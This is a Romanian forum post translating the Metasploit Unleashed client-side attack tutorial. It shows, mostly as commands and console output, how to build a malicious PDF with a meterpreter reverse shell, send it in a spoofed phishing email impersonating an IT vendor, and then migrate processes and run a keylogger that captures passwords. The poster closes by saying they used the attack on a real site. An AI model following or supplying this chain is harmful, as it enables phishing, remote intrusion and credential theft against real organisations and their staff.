Search the Community

Pentru a demonstra puterea si modul MSF cum pot fi folosite in "client side" atac voi folosi o poveste.În lumea de securitate, de inginerie social? a devenit un vector de atac ce în ce mai utilizate. Chiar dac? tehnologiile se schimb?, un lucru care pare s? r?mân? acela?i lucru este lipsa de "securitate cu oamenii". Datorit? faptului c?,inginerie social? a devenit un foarte "fierbinte" subiect în lumea securitati. În scenariul nostru primul lucru care a fost de a culege o multime de informa?ii folosind instrumente, cum ar fi in cadru Metasploit, Maltego ?i alte instrumente pentru a aduna adrese de e-mail si informatii pentru a lansa un atac client side pe victima. Dup? o scufundare in tomberonul informatiilor ?i cautari dupa email-uri de pe web, am gasit dou? informa?ii importante despre tinta. 1) Ei folosesc "Best Computers" pentru servicii tehnice. 2) Departamentul IT are o adres? de e-mail a itdept@victim.com Dorim s? uplodam shell pe calculatorul departamentului IT ?i executa un key-logger pentru a ob?ine parole, Intel sau orice alte informatii. Vom începe prin înc?rcarea msfconsole nostru. Dupa ce le-am sunt înc?rcate, cream un fisier PDF malitios care ne ofera o portita in securitate tintei. Pentru a face acest lucru, trebuie s? apar? legitim, au un titlu care este realist, si sa nu fie semnalizat de anti-virus sau alt software de alert? de securitate. Vom utiliza Adobe Reader 'util.printf()' JavaScript Function Stack Buffer Overflow Vulnerability. Adobe Reader este predispus la un stack-based buffer overflow vulnerabilitate, deoarece-cererea nu reu?e?te s? efectueze controale adecvate de frontier? de pe ghidul de-a furnizat datele. Un atacator poate exploata aceast? problem? pentru a executa cod arbitrar cu privilegiile utilizatorului care ruleaz? aplica?ia sau accident cererii, negând serviciu pentru utilizatorii legitim. Deci, vom începe prin crearea nostru de fisier malware PDF pentru a fi utilizate în acest atac "client -side". msf > use exploit/windows/fileformat/adobe_utilprintf msf exploit(adobe_utilprintf) > set FILENAME BestComputers-UpgradeInstructions.pdf FILENAME => BestComputers-UpgradeInstructions.pdf msf exploit(adobe_utilprintf) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(adobe_utilprintf) > set LHOST 192.168.8.128 LHOST => 192.168.8.128 msf exploit(adobe_utilprintf) > set LPORT 4455 LPORT => 4455 msf exploit(adobe_utilprintf) > show options Module options: Name Current Setting Required Description ---- --------------- -------- ----------- FILENAME BestComputers-UpgradeInstructions.pdf yes The file name. OUTPUTPATH /pentest/exploits/framework3/data/exploits yes The location of the file. Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process LHOST 192.168.8.128 yes The local address LPORT 4455 yes The local port Exploit target: Id Name -- ---- 0 Adobe Reader v8.1.2 (Windows XP SP3 English) Dup? ce vom seta toate op?iunile stabilite modul în care dorim, vom rula "exploit" pentru a crea fisierul malitios. msf exploit(adobe_utilprintf) > exploit [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Creating 'BestComputers-UpgradeInstructions.pdf' file... [*] Generated output file /pentest/exploits/framework3/data/exploits/BestComputers-UpgradeInstructions.pdf [*] Exploit completed, but no session was created. msf exploit(adobe_utilprintf) > Deci, putem vedea c? fisierul nostru în format PDF a fost creat într-un sub-director de unde suntem. Deci, haide?i s? copiam in directorul nostru / tmp deci este mai u?or de a localiza mai târziu în exploit nostru. Înainte de a ne trimite fisier malware pentru victima noastr? avem nevoie pentru a configura un ascult?tor pentru a captura aceast? conexiune invers?. Vom folosi msfconsole s? înfiin?eze ascult?torul nostru pentru manipulare. msf > use exploit/multi/handler msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp PAYLOAD => windows/meterpreter/reverse_tcp msf exploit(handler) > set LPORT 4455 LPORT => 4455 msf exploit(handler) > set LHOST 192.168.8.128 LHOST => 192.168.8.128 msf exploit(handler) > exploit [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Starting the payload handler... Acum, c? ascult?torul nostru este în a?teptare pentru a primi sarcina sa util?, r?u inten?ionat trebuie numai s? le livram la victima ?i deoarece în culegerea de informa?ii noastr? am ob?inut adresa de e-mail a departamentului de IT, vom folosi un script la îndemân? mic numit sendEmail pentru a oferi aceast? sarcin? util? pentru a victim?. Cu un kung-fu-o linie, se poate ata?a PDF malitios, utilizam orice server SMTP dorim ?i s? scriem un e-mail destul de conving?toare de la orice adres? vrem .... root@bt:~# sendEmail -t itdept@victim.com -f techsupport@bestcomputers.com -s 192.168.8.131 -u Important Upgrade Instructions -a /tmp/BestComputers-UpgradeInstructions.pdf Reading message body from STDIN because the '-m' option was not used. If you are manually typing in a message: - First line must be received within 60 seconds. - End manual input with a CTRL-D on its own line. IT Dept, We are sending this important file to all our customers. It contains very important instructions for upgrading and securing your software. Please read and let us know if you have any problems. Sincerely, Best Computers Tech Support Aug 24 17:32:51 bt sendEmail[13144]: Message input complete. Aug 24 17:32:51 bt sendEmail[13144]: Email was sent successfully! Dup? cum putem vedea aici, script-ul ne permite s? afi?ezi orice DIN (-f), adresa de orice TO (-t), orice SMTP (-e) serverul, precum ?i titlurile (-u) ?i ata?amentul nostru malware (-a ). Odat? ce vom face tot ceea ce vrem, apasam enter putem scrie orice mesaj ne-o dorim, apoi ap?sam CTRL + D ?i acest lucru va trimite e-mail pentru a victimei. Acum pe masina victimei, IT angajat al Departamentul de Securitate este obtinerea softwarelor la zi el verifica e-mail lui. El vede ca este un document foarte important isi copiaz? pe desktop-ul lui (ca el face întotdeauna) astfel încât el poate scana acest lucru cu program anti-virus. Dup? cum putem vedea, acesta a trecut cu brio si VICTIMA noastra este dispus s? deschid? acest fi?ier pentru a pune în aplicare rapida acest upgrade-uri foarte importante. F?când clic pe fi?ierul se deschide Adobe, dar prezinta o fereastr? în gri, care nu dezv?luie un PDF. În schimb, conexiunea inversa se executa pe masina victimei. [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Starting the payload handler... [*] Sending stage (718336 bytes) session[*] Meterpreter session 1 opened (192.168.8.128:4455 -> 192.168.8.130:49322) meterpreter > Avem acum o coaj? de pe computerul lor printr-un atac r?u inten?ionat PDF client side attack. Desigur, ceea ce ar fi în?elept în acest moment este de a muta coaj? (shell) într-un proces diferit, asa ca atunci cand ei se ucid Adobe nu ne pierdem shellul nostru. Apoi vom ob?ine informa?ii de sistem, începem un key-logger ?i de a continua exploatarea re?elei. meterpreter > ps Process list ============ PID Name Path --- ---- ---- 852 taskeng.exe C:\Windows\system32\taskeng.exe 1308 Dwm.exe C:\Windows\system32\Dwm.exe 1520 explorer.exe C:\Windows\explorer.exe 2184 VMwareTray.exe C:\Program Files\VMware\VMware Tools\VMwareTray.exe 2196 VMwareUser.exe C:\Program FilesVMware\VMware Tools\VMwareUser.exe 3176 iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe 3452 AcroRd32.exe C:\Program Files\AdobeReader 8.0\ReaderAcroRd32.exe meterpreter > run post/windows/manage/migrate [*] Running module against V-MAC-XP [*] Current server process: svchost.exe (1076) [*] Migrating to explorer.exe... [*] Migrating into process ID 816 [*] New server process: Explorer.EXE (816) meterpreter > sysinfo Computer: OFFSEC-PC OS : Windows Vista (Build 6000, ). meterpreter > use priv Loading extension priv...success. meterpreter > run post/windows/capture/keylog_recorder [*] Executing module against V-MAC-XP [*] Starting the keystroke sniffer... [*] Keystrokes being saved in to /root/.msf3/loot/20110323091836_default_192.168.1.195_host.windows.key_832155.txt [*] Recording keystrokes... root@bt:~# cat /root/.msf3/loot/20110323091836_default_192.168.1.195_host.windows.key_832155.txt Keystroke log started at Wed Mar 23 09:18:36 -0600 2011 Support, I tried to open ti his file 2-3 times with no success. I even had my admin and CFO tru y it, but no one can get it to p open. I turned on the rmote access server so you can log in to fix our p this problem. Our user name is admin and password for that session is 123456. Call or eme ail when you are done. Thanks IT Dept Tradus de mine de la Sursa : Client Side Attacks - Metasploit Unleashed Inspirat din tutorialul de mai sus am folosit atacul la https://rstcenter.com/forum/55239-unkn0wn-www-fsconsult.rst